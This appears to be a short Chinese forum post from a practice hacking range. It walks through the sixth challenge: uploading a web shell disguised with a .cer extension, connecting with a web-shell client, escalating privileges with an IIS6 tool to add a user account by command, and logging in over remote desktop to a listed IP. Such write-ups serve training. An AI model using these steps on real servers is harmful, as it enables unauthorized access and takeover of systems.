靶场第六题 九五作业

九五   ·   发表于 2018-7-31   ·   CTF&WP专版

通过第五题进入了后台找到产品管理可以修改上传文件

制作了一句话木马程序,把后缀名改为cer可以上传

之后用菜刀连接,但是没有权限访问C盘

通过E:5\admin\Databackup\打开CMD

输入命令whoima,拒绝访问

输入命令iis6.exe "net user jiuwu 1234 /add"

net user发现成功添加用户

mstsc /admin命令,远程连接桌面120.203.13.75

使用用户名jiuwu,密码1234 就可以登陆到网站服务器

打赏我,让我更有动力~

0 Reply   |  Until 2018-7-31 | 405 View
LoginCan Publish Content
返回顶部

掌控者 © 2016. All Rights Reserved. 掌控者

Powered by 掌控者 Version 2.1.3